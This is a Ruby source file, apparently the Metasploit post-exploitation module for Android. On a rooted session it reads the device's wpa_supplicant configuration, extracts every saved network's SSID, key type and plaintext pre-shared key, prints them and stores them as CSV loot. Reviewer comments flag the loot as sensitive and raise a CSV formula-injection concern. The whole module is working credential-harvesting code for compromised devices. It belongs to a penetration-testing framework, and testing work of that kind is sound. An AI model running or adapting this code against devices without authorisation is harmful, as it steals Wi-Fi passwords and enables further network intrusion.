
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/android/gather/wireless_ap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
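# Post module that reads the wpa_supplicant configuration from an Android
# session, extracts each saved network's SSID, key management type and PSK,
# prints them as a table and stores the same table as CSV loot.
#
# Handling notes for operators and reviewers:
# * The stored loot contains pre-shared keys in plaintext; treat the loot file
#   as sensitive engagement data (access control, retention, reporting).
# * SSID and PSK text is copied from a file on the remote device without
#   sanitisation. NOTE(review): confirm that Rex::Text::Table#to_csv
#   neutralises cells starting with = + - @ before the CSV is opened in a
#   spreadsheet tool.
class MetasploitModule < Msf::Post

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Android::Priv

  # Registers the module metadata (name, description, authors, supported
  # session types and platform) with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Displays wireless SSIDs and PSKs',
          'Description' => %q{
            This module displays all wireless AP creds saved on the target device.
          },
          'License' => MSF_LICENSE,
          'Author' => ['Auxilus', 'timwr'],
          'SessionTypes' => [ 'meterpreter', 'shell' ],
          'Platform' => 'android'
        }
      )
    )
  end

  # Reads the supplicant configuration, prints the saved networks and stores
  # them as loot. Stops early with an error message when the session is not
  # root or when no network entries could be parsed.
  #
  # @return [void]
  def run
    # The module refuses to continue without root, as checked by is_root?.
    unless is_root?
      print_error('This module requires root permissions.')
      return
    end

    data = read_file('/data/misc/wifi/wpa_supplicant.conf')
    # parse_wpa_supplicant tolerates a nil/empty read, so a missing or
    # unreadable file ends up in the "no APs" branch instead of raising.
    aps = parse_wpa_supplicant(data)

    if aps.empty?
      print_error('No wireless APs found on the device')
      return
    end

    ap_tbl = Rex::Text::Table.new(
      'Header' => 'Wireless APs',
      'Indent' => 1,
      'Columns' => ['SSID', 'net_type', 'password']
    )

    # Each entry is [ssid, key_mgmt, psk]; any of them may be nil when the
    # option is not present in the network block.
    aps.each do |ssid, net_type, password|
      ap_tbl << [ssid, net_type, password]
    end

    print_line(ap_tbl.to_s)

    # The loot holds plaintext PSKs; see the handling notes on the class.
    loot_path = store_loot(
      'wireless.ap.creds',
      'text/csv',
      session,
      ap_tbl.to_csv,
      'wireless_ap_credentials.txt'
    )
    print_good("Secrets stored in: #{loot_path}")
  end

  # Splits the configuration text into its network={ ... } blocks and parses
  # each one.
  #
  # @param data [String, nil] raw file content; nil or empty yields no entries
  #   (presumably read_file returns nil when the file cannot be read; verify
  #   against Msf::Post::File)
  # @return [Array<Array>] one [ssid, key_mgmt, psk] triple per network block
  def parse_wpa_supplicant(data)
    # to_s turns a failed read (nil) into an empty string so scan finds nothing.
    data.to_s.scan(/^network={$(.*?)^}$/m).map do |block|
      parse_network_block(block[0])
    end
  end

  # Extracts the three reported fields from one network block.
  #
  # @param block [String] text between "network={" and the closing "}"
  # @return [Array] [ssid, key_mgmt, psk]; missing options are nil
  def parse_network_block(block)
    ssid = parse_option(block, 'ssid')
    type = parse_option(block, 'key_mgmt', false)
    psk = parse_option(block, 'psk')
    [ssid, type, psk]
  end

  # Looks up a single "token=value" line inside a network block.
  #
  # With strip_quotes the quoted form token="value" is tried first and the
  # quotes are dropped; otherwise, or when the value is not quoted, the raw
  # text after the equals sign is returned.
  #
  # @param block [String] network block text
  # @param token [String] option name, matched literally
  # @param strip_quotes [Boolean] whether to prefer and unwrap a quoted value
  # @return [String, nil] the option value, or nil when the option is absent
  def parse_option(block, token, strip_quotes = true)
    # Escape the name so it can never be read as regex syntax.
    name = Regexp.escape(token)
    # ^ and $ are per-line anchors on purpose: the block spans several lines.
    quoted = block[/^\s#{name}="(.+)"$/, 1] if strip_quotes
    quoted || block[/^\s#{name}=(.+)$/, 1]
  end

end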